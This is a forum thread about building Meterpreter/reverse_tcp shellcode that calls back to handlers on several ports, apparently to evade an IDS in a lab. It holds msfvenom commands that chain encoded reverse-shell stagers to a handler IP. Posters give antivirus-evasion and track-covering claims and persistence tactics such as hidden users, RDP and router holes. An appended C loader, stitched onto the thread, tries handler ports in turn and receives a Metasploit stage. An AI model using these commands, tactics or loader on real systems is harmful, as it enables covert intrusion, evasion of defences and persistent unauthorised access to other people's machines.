bobbyb1980 Posted June 5, 2012

Hey guys. Was wondering if anyone would be able to help me with the following: I'm trying to generate shellcode that I can compile that will call out to multiple ports. For example, I'd want a windows/meterpreter/reverse_tcp payload that connects back to listeners on ports 80, 21 and 443. I know this is possible with msfvenom to generate an .exe, but I really only need the first stage of the meterpreter payload(s) in shellcode. Thanks.
digip Posted June 5, 2012

Meterpreter reverse connection means they connect back to you on the port you listen on for the initial connection. The rest of what you want to do would be done in post exploitation. I don't think the initial payload opens more than one connection back to you, but I'm sure you could make it do it in post.

Using an executable like with venom, though, means you would be leaving something on their system, and makes it that much easier to (1) remove the malware and (2) trace it back to you. You could try port binds, but then you have to figure out getting past NAT next time they reboot or log off. Anything that touches disk, though, is generally a bad move, and since meterpreter runs in memory, you are also limited till their next reboot, so you have to pick how you want to do it.

Personally, I would stick with legit built-in functionality, like enabling RDP on their machine, adding another user and hiding it from the home logon screen, and setting up a VPN. This way you can maintain persistence with the built-in tools of their OS, since they don't set off most antivirus, etc. You still might have issues with NAT after a reboot, though, so you would need to poke holes in their router to keep a way in.

If using Armitage, I believe you can open multiple channels once you have an initial session: you can clone them to new channels and ports, migrate to multiple services, then get system to do whatever you need.

Maybe this will help - http://www.backtrack-linux.org/forums/showthread.php?t=29615

Edited June 5, 2012 by digip
bobbyb1980 Posted June 5, 2012 (Author)

digip - Thank you for your reply. Generating C-based shellcode and compiling it into a PE exe or into some other exploit has a near 100% antivirus evasion success rate, so writing to disk isn't really a problem. Once you get the shell you just migrate and delete the payload and run the normal "clean up your tracks" tasks, and all should be good in the world. Setting up RDP and VPNs is outside the scope of my objective; the router is hard as a rock also. Just need a basic shell.

I've solved the problem (I think), so perhaps others would like to take a look. My problem is that I'm doing a lab with a beefy IDS setup. The goal is to have one .exe that will call out to multiple handlers on multiple ports, so if one port fails, then hopefully another will work, in an attempt to evade the IDS/firewall. The following code SHOULD do that; still need to run some tests, but based on past experience I think it will work (don't have my machine handy to test : ( ). God willing the ports aren't filtered.

msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=80 exitfunc=thread > /tmp/80.raw

msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=53 exitfunc=thread -c /tmp/80.raw > /tmp/53.raw

msfvenom -p windows/shell/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/53.raw > 215380.c

"Personally, I would stick with legit built in functionality"

We're hackers - we create our own built-in functionality : )
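Added example, not from the thread and not msfvenom output: a small C loader that does in one place what the post above is chaining three stagers together for. It walks a list of handler ports in order with a per-port timeout (so a port the firewall silently drops costs a few seconds rather than the kernel's full SYN-retry window before the next one is tried), and then reads one stage from whichever connection succeeds using the framing Metasploit's reverse_tcp handler uses (a 4-byte little-endian length, then the stage bytes), capped so a hostile handler cannot make the loader overrun its buffer. Worth knowing when comparing it with the msfvenom chain: each generated stager carries its own exit routine for the connect-failure case, so whether control actually falls through to the next stager is something to verify on a lab box, whereas this loop falls through by construction. The code uses POSIX sockets and builds on Linux; a Windows build would swap in Winsock (WSAStartup, ioctlsocket for non-blocking mode, closesocket). LHOST, the port list, the --dry-run connector and the constructed test frames are placeholders, and mapping and executing the received stage is deliberately left out.

```c
/* Multi-port fallback reverse connector (added example). POSIX sockets;
 * host and port list below are placeholders, not a real handler. */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>

typedef int (*connect_fn)(const char *host, uint16_t port, int timeout_ms);

static int fail_close(int fd) { close(fd); return -1; }

/* Non-blocking connect with a timeout. Returns a blocking fd or -1.
 * A closed port fails fast (RST -> ECONNREFUSED); a filtered port
 * fails after timeout_ms instead of hanging the loader. */
int tcp_connect_timeout(const char *host, uint16_t port, int timeout_ms)
{
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, host, &sa.sin_addr) != 1)
        return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    int flags = fcntl(fd, F_GETFL, 0);
    fcntl(fd, F_SETFL, flags | O_NONBLOCK);
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        if (errno != EINPROGRESS)
            return fail_close(fd);
        fd_set wfds;
        FD_ZERO(&wfds);
        FD_SET(fd, &wfds);
        struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
        if (select(fd + 1, NULL, &wfds, NULL, &tv) <= 0)
            return fail_close(fd);           /* timed out: port is filtered */
        int err = 0;
        socklen_t len = sizeof err;
        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &err, &len) < 0 || err != 0)
            return fail_close(fd);           /* connect completed with an error */
    }
    fcntl(fd, F_SETFL, flags);               /* back to blocking for the stage read */
    return fd;
}

/* Dry-run connector (placeholder): ports in sim_open count as listening,
 * everything else as filtered. Lets the port order be checked offline. */
static const uint16_t sim_open[] = { 443 };
int sim_connect(const char *host, uint16_t port, int timeout_ms)
{
    (void)host; (void)timeout_ms;
    for (size_t i = 0; i < sizeof sim_open / sizeof sim_open[0]; i++)
        if (sim_open[i] == port)
            return open("/dev/null", O_RDONLY);  /* any valid fd will do here */
    return -1;
}

/* Try each port in order. Returns the index of the first port that
 * accepted and hands its fd back via *out_fd; -1 if none did. */
int connect_first_port(const char *host, const uint16_t *ports, size_t n,
                       int timeout_ms, connect_fn conn, int *out_fd)
{
    for (size_t i = 0; i < n; i++) {
        int fd = conn(host, ports[i], timeout_ms);
        if (fd < 0)
            continue;                        /* fall through to the next port */
        if (out_fd) *out_fd = fd; else close(fd);
        return (int)i;
    }
    if (out_fd) *out_fd = -1;
    return -1;
}

static int read_full(int fd, unsigned char *p, size_t n)
{
    while (n) {
        ssize_t r = read(fd, p, n);
        if (r <= 0) return -1;
        p += r; n -= (size_t)r;
    }
    return 0;
}

/* Metasploit's reverse_tcp handler frames the stage as a 4-byte
 * little-endian length followed by the stage. Rejects lengths above cap
 * so a hostile handler cannot overrun buf. Returns stage length or -1. */
ssize_t read_stage(int fd, unsigned char *buf, size_t cap)
{
    unsigned char h[4];
    if (read_full(fd, h, 4) < 0) return -1;
    uint32_t len = h[0] | (uint32_t)h[1] << 8 | (uint32_t)h[2] << 16 | (uint32_t)h[3] << 24;
    if (len == 0 || len > cap) return -1;
    if (read_full(fd, buf, len) < 0) return -1;
    return (ssize_t)len;
}

int main(int argc, char **argv)
{
    const char *host = "192.168.91.135";            /* placeholder LHOST */
    const uint16_t ports[] = { 80, 53, 21, 443 };   /* tried in this order */
    int dry = argc > 1 && strcmp(argv[1], "--dry-run") == 0;
    static unsigned char stage[4 * 1024 * 1024];    /* 4 MiB cap on a stage */
    int fd;
    int idx = connect_first_port(host, ports, 4, 3000,
                                 dry ? sim_connect : tcp_connect_timeout, &fd);
    if (idx < 0) { fputs("no handler reachable\n", stderr); return 1; }
    printf("connected on port %u\n", (unsigned)ports[idx]);
    if (dry) { close(fd); return 0; }
    ssize_t n = read_stage(fd, stage, sizeof stage);
    printf("stage: %zd bytes\n", n);  /* mapping and running it is left out */
    close(fd);
    return n < 0;
}
```

Run it with --dry-run to confirm the fallback order without a handler; without the flag it needs a listener on the placeholder host, e.g. a multi/handler for windows/shell/reverse_tcp on one of the listed ports.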